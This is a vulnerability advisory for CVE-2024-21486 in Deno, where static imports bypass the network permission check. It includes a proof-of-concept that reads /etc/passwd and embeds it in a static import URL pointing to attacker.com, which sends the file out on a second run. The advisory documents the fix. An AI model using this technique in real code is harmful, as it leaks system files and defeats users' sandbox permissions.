CVE-2024-21486

Summary

Static imports are exempted from the network permission check. An attacker could exploit this to leak the password file on the network.

Details

Static imports in Deno are exempted from the network permission check. This can be exploited by attackers in multiple ways, when third-party code is directly/indirectly executed with deno run:

The simplest payload would be a tracking pixel-like import that attackers place in their code to find out when developers use the attacker-controlled code.
When --allow-write and --allow-read permissions are given, an attacker can perform a sophisticated two-steps attack: first, they generate a ts/js file containing a static import and in a second execution load this static file.

PoC

const __filename = new URL(&quot;&quot;, import.meta.url).pathname;
let oldContent = await Deno.readTextFile(__filename);
let passFile = await Deno.readTextFile(&quot;/etc/passwd&quot;);
let pre =
  &#039;import {foo} from &quot;[https://attacker.com?val=](https://attacker.com/?val=)&#039; +
  encodeURIComponent(passFile) + &#039;&quot;;\n&#039;;
await Deno.writeTextFile(__filename, pre + oldContent);

Executing a file containing this payload twice, with deno run --allow-read --allow-write would cause the password file to leak on the network, even though no network permission was granted.

This vulnerability was fixed with the addition of the --allow-import flag: https://docs.deno.com/runtime/fundamentals/security/#network-access

Published: Jun 5, 2025
Updated: Jun 5, 2025
CVE: CVE-2024-21486
GHSA: GHSA-jv4x-jv3h-qff5
Severity: Medium
Exploit:

CVSS v3:

Severity: Unknown
Score:
AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CWEs:

CWE-200

Affected Software
References

Software	From	Fixed in
deno	-	2.0.0

https://github.com/denoland/deno/security/advisories/GHSA-jv4x-jv3h-qff5

Vulnerability Database

309,364

CVE-2024-21486

Summary

Details

PoC

Deep Security Visibility Without the Complexity